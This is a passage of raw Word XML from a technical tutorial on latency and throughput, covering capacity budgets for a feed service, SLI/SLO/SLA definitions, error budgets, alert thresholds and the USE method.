          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 Throughput Budgets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C1DD59" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example: Social media feed (target: 100K RPS for feed reads):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725574F9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537565E6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Load balancer:      500K RPS capacity (over-provisioned)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D302B1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Feed service:       10 instances × 15K RPS = 150K RPS capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1B2DD9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Cache (Redis):      5 nodes × 200K ops/sec = 1M ops/sec capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BAA6BD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Cache hit ratio:  95% → only 5K RPS reach DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339B7063" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Database (reads):   3 replicas × 20K QPS = 60K QPS capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3343A1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Actual load:      5K QPS (5% miss rate × 100K RPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B66422" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="0A2C54E1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Bottleneck: Feed service (150K RPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C0FE1F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Headroom: 150K / 100K = 1.5x (need more instances for safety)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E1E8EB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="7A2C9B17">
          <v:rect id="_x0000_i5110" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB14A4D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. SLAs, SLOs, and SLIs — Formalizing Latency and Throughput Commitments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487C3806" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 Definitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607E2607" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SLI (Service Level Indicator):</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> The metric being measured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6285D14D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BB735B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>SLI: "Request latency" (p99 over a 5-minute window)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C45319E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>SLI: "Availability" (successful requests / total requests)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758D3FC7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>SLI: "Throughput" (successful requests per second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D4BD23" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SLO (Service Level Objective):</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> The target for the SLI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A68CDB1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A7E14E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>SLO: "p99 latency &lt; 200ms over any 5-minute window"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307B5DA8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>SLO: "Availability &gt; 99.9% monthly"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C4B43A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>SLO: "Sustained throughput ≥ 50,000 RPS without degradation"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2042BF68" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SLA (Service Level Agreement):</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> The contractual promise (with consequences for violation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB5C44F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4738E822" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>SLA: "If p99 latency exceeds 500ms for &gt; 1% of a month, customer receives 10% credit"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2E4D98" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>SLA: "If availability drops below 99.9%, customer receives 25% credit"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2463B9FB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 Error Budgets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E28C1B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The error budget concept (Google SRE):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E25AAF2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761BD629" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>SLO: 99.9% availability (allows 0.1% errors)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F3D157" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Monthly requests: 100 million</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B2C68E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Error budget: 100,000 failed requests per month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D780828" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="40DDC6D0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Used: 40,000 failures (from a brief outage)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17210310" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Remaining: 60,000 failures (can still deploy new features)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687F4D0F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="76BC26E4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>If budget is exceeded: freeze deployments, focus on reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2CEEFE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency error budget:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D94AFB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1E6EAE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>SLO: p99 &lt; 200ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2688C77A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Monthly request-minutes: 43,200 (one month in minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68596AFC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Latency budget: 1% of minutes can have p99 &gt; 200ms = 432 minutes/month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496A3351" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="0A3F883D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>If a deployment causes p99 spike for 60 minutes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425A4F85" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Budget consumed: 60/432 = 14%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA98679" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Remaining: 86% of budget for the month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B988BAE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="1C46AF21">
          <v:rect id="_x0000_i5111" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76333CC4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Monitoring and Alerting on Throughput and Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AF3200" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 What to Monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1DFB26" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency monitoring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B38AFC7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BC505E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>- p50, p90, p95, p99, p99.9 (histogram)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B63EF47" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>- Measured at: client, load balancer, application, database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DF5B6C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>- Time resolution: per-minute aggregation minimum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC315E6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>- Breakdowns: by endpoint, by region, by client type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392C0653" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Throughput monitoring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FB7BF6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CF7618" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>- Requests per second (total and per-endpoint)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF23582" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>- Successful vs. failed RPS (error rate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FB9E4F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>- Capacity utilization: current RPS / max tested RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F50D9F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>- Per-instance RPS (detect hot spots)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44186D32" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.2 Alerting Strategy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00"/>
        <w:gridCol w:w="2374"/>
        <w:gridCol w:w="2502"/>
      </w:tblGrid>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="6114F0C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21E83C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Metric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D7342B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Warning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F91E87" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001F1994">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="51DA3C3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65733B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>p99 latency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028B13" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>&gt; 2x normal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9E66CA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>&gt; 5x normal or &gt; SLO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="04ED6B0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449B84" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Throughput drop</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0EDDC3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>&lt; 80% of expected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5E4E44" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>&lt; 50% of expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="26CDD4D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2FF410" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Error rate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B2E1B5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>&gt; 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8992B4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>&gt; 5%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="7D6E9DC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6B1798" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Utilization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74F3BE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>&gt; 70%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B78B7A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>&gt; 85%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F1994" w:rsidRPr="001F1994" w14:paraId="601DEE7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A81964" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Queue depth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E2BE10" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Growing for &gt; 1 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A23025" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
            <w:r w:rsidRPr="001F1994">
              <w:t>Growing for &gt; 5 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7751D15F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.3 The USE Method (Brendan Gregg)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DA25AC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>For every resource (CPU, memory, network, disk):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E3EA37" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1435"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t>tilization: Percentage of time the resource is busy. (High utilization → latency source.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599CF255" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1435"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t>aturation: Degree of queuing (work waiting). (Any saturation → throughput bottleneck.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7509831D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1435"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t>rrors: Count of error events. (Errors reduce effective throughput.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F7E062" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="5EB93C82">
          <v:rect id="_x0000_i5112" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2867B1FF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. The Fundamental Tradeoffs — Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D24456D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
